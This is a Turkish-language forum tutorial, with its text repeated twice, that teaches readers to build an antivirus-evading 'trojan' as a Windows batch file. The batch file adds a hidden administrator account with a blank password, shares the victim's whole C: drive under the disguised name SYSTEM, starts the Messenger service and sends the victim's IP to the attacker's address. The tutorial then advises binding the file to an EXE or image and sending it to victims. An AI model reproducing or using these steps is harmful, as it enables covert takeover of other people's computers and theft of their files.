Anasayfa
Dökümanı tamamen okursanız size yararı olucagını düşünüyorum...
Evet arkadaslar* konunun başlığından da anlayabileceginiz gibi Anti Virüs programları tarafından tanınmayan tamamen size ait bir truva atı yapmayı size kısaca anlatacağım;
Truva atının ana amacı* adından da anlaşılacağı gibi hedef sisteme sızarak sistemi ele geçirmek ya da bilgi toplamaktır. Dikkat edin zarar vermek demiyorum çünkü bu etik olarak yanlış bir harekettir
Piyasada bu konuda son derece fonksiyonel bircok truva atı var fakat bu truva atlarını kodlayanların hepsi Ticari amac güttükleri icin ki bu konuda da sonuna kadar haklıdırlar* Truva atlarının özel yapım(special edition) olan versiyonlarının dışındaki tüm Public versiyonlari maalesef AV lerce tanınmakta ve hepsinden önemlisi Firewallar tarafindan engellenmektedirler ve bu da kullanıcılarin işini oldukca zorlastırmaktadır.
Size şimdi anlatacağim yöntem* biraz mantık biraz da teknik bilgi gerektirmektedir. Bu ikisinin dışında başka hicbir programa(toola) ihtiyacınız yoktur.
Şimdi Truva atımızı hazırlamaya başlayalım;
1-) Öncelikle bir TXT dosyası açın ve içine şu komutu girin;
net user HACK /add
Bu komut sayesinde kurbanin makinasında "HACK" isminde bir user yarattık. Fakat bu user hesabı normal olarak açıldigi icin hakları da sınırlı olacaktır. Bu nedenle ikinci aşamaya geçiyoruz;
2-) şimdi yukarıdaki komutun hemen bir alt satırına geçin ve şu komutu ekleyin;
net localgroup administrators HACK /add
Böylece "HACK" isimli kullanıcı hesabını* direk yönetici(admin) grubuna kattık. Artık "HACK" hesabımız tüm yetkilere sahip.
3-) Simdi de kurbanımızın makinasındaki C:\\ sürücüsünü sınırsız paylaşıma açacağız. Kurbanı da huylandırmamak için paylaşım adını SYSTEM olarak yapacağız. Bunun için aşağıdaki komutu kullanacağız;
net share system=C:\\ /unlimited
Evet artık Kurbanımızın makinasını sonuna kadar açtık. Peki kurbanın IP sini nereden bileceğiz de kurbanın makinasina bu yarattığımız "HACK" hesabından bağlanacağız?
Bunun için de kodumuza bir satırlık bir komut daha ekleyeceğiz;
4-) NET SEND komutunu kullanarak kurbanın bize Windows’un Messaging Servisi vasıtası ile mesaj atmasını ve IP sını bize söylemesini saglayacağız. Bunun icin aşağıdaki komutu da kodunuzun içerisine ekleyin;
net send 82.35.23.46(buraya kendi IP nizi girin) Ben senin kurbanınım Gel bana baglan
Unutmayın 82. li baslayan IP adresi yerine kendi IP nizi yazin.
4-) Son olarak ufak bir önlem alacagiz. Peki nedir bu önlem? Bildiğiniz gibi Windows Messenger Servisini kullanan internette ortalıkta gezinen bircok ufak tefek Spylar oldugu icin Messenger servisi genelde Disabled ’dir. Disabled olursa NET SEND komutu bir işe yaramaz. Iste bu son önlemimizde de bu servisi Disabled tan Automatic moduna set ettirecegiz. Öncelikle Administrative Tools dan Services sekmesine giriyoruz ve oradan Messenger servisinin kod icerisinde kullanacagimiz adını öğreniyoruz. Adi Messenger ’mis. simdi bu adı kullanarak bu servisi çalıstırıyoruz.
net start Messenger
Size tavsiyem* bu son komutu kodunuzun en basina koymaniz. Böylelikle ardışık sırada önce Messenger servisi çalıştırılacak daha sonra diğer işlemler yapılacaktır. Kodun sağlıklı çalışması açısından bu 4. şıkkı ilk sıraya koymanız daha iyi olur.
Son olarak TXT de yazdığınız kodunuzu .bat olarak istediginiz bir isimde kaydedin ve ister bir EXE ile join ettirin ister bir resim ile birlestirin isterseniz kurbaniniza direk gönderin.
Kurbanınız bu dosyayı çalıştırdiğı an makinasında Admin haklarına sahip HACK adında bir user açılacak ve şifresi de blank yani boş olacaktır. C:\\ sürücüsü de full olarak paylasima açilmış olacak ve son olarak da IP si size gelecektir.
Evet arkadaslar* konunun başlığından da anlayabileceginiz gibi Anti Virüs programları tarafından tanınmayan tamamen size ait bir truva atı yapmayı size kısaca anlatacağım;
Truva atının ana amacı* adından da anlaşılacağı gibi hedef sisteme sızarak sistemi ele geçirmek ya da bilgi toplamaktır. Dikkat edin zarar vermek demiyorum çünkü bu etik olarak yanlış bir harekettir
Piyasada bu konuda son derece fonksiyonel bircok truva atı var fakat bu truva atlarını kodlayanların hepsi Ticari amac güttükleri icin ki bu konuda da sonuna kadar haklıdırlar* Truva atlarının özel yapım(special edition) olan versiyonlarının dışındaki tüm Public versiyonlari maalesef AV lerce tanınmakta ve hepsinden önemlisi Firewallar tarafindan engellenmektedirler ve bu da kullanıcılarin işini oldukca zorlastırmaktadır.
Size şimdi anlatacağim yöntem* biraz mantık biraz da teknik bilgi gerektirmektedir. Bu ikisinin dışında başka hicbir programa(toola) ihtiyacınız yoktur.
Şimdi Truva atımızı hazırlamaya başlayalım;
1-) Öncelikle bir TXT dosyası açın ve içine şu komutu girin;
net user HACK /add
Bu komut sayesinde kurbanin makinasında "HACK" isminde bir user yarattık. Fakat bu user hesabı normal olarak açıldigi icin hakları da sınırlı olacaktır. Bu nedenle ikinci aşamaya geçiyoruz;
2-) şimdi yukarıdaki komutun hemen bir alt satırına geçin ve şu komutu ekleyin;
net localgroup administrators HACK /add
Böylece "HACK" isimli kullanıcı hesabını* direk yönetici(admin) grubuna kattık. Artık "HACK" hesabımız tüm yetkilere sahip.
3-) Simdi de kurbanımızın makinasındaki C:\\ sürücüsünü sınırsız paylaşıma açacağız. Kurbanı da huylandırmamak için paylaşım adını SYSTEM olarak yapacağız. Bunun için aşağıdaki komutu kullanacağız;
net share system=C:\\ /unlimited
Evet artık Kurbanımızın makinasını sonuna kadar açtık. Peki kurbanın IP sini nereden bileceğiz de kurbanın makinasina bu yarattığımız "HACK" hesabından bağlanacağız?
Bunun için de kodumuza bir satırlık bir komut daha ekleyeceğiz;
4-) NET SEND komutunu kullanarak kurbanın bize Windows’un Messaging Servisi vasıtası ile mesaj atmasını ve IP sını bize söylemesini saglayacağız. Bunun icin aşağıdaki komutu da kodunuzun içerisine ekleyin;
net send 82.35.23.46(buraya kendi IP nizi girin) Ben senin kurbanınım Gel bana baglan
Unutmayın 82. li baslayan IP adresi yerine kendi IP nizi yazin.
4-) Son olarak ufak bir önlem alacagiz. Peki nedir bu önlem? Bildiğiniz gibi Windows Messenger Servisini kullanan internette ortalıkta gezinen bircok ufak tefek Spylar oldugu icin Messenger servisi genelde Disabled ’dir. Disabled olursa NET SEND komutu bir işe yaramaz. Iste bu son önlemimizde de bu servisi Disabled tan Automatic moduna set ettirecegiz. Öncelikle Administrative Tools dan Services sekmesine giriyoruz ve oradan Messenger servisinin kod icerisinde kullanacagimiz adını öğreniyoruz. Adi Messenger ’mis. simdi bu adı kullanarak bu servisi çalıstırıyoruz.
net start Messenger
Size tavsiyem* bu son komutu kodunuzun en basina koymaniz. Böylelikle ardışık sırada önce Messenger servisi çalıştırılacak daha sonra diğer işlemler yapılacaktır. Kodun sağlıklı çalışması açısından bu 4. şıkkı ilk sıraya koymanız daha iyi olur.
Son olarak TXT de yazdığınız kodunuzu .bat olarak istediginiz bir isimde kaydedin ve ister bir EXE ile join ettirin ister bir resim ile birlestirin isterseniz kurbaniniza direk gönderin.
Kurbanınız bu dosyayı çalıştırdiğı an makinasında Admin haklarına sahip HACK adında bir user açılacak ve şifresi de blank yani boş olacaktır. C:\\ sürücüsü de full olarak paylasima açilmış olacak ve son olarak da IP si size gelecektir.
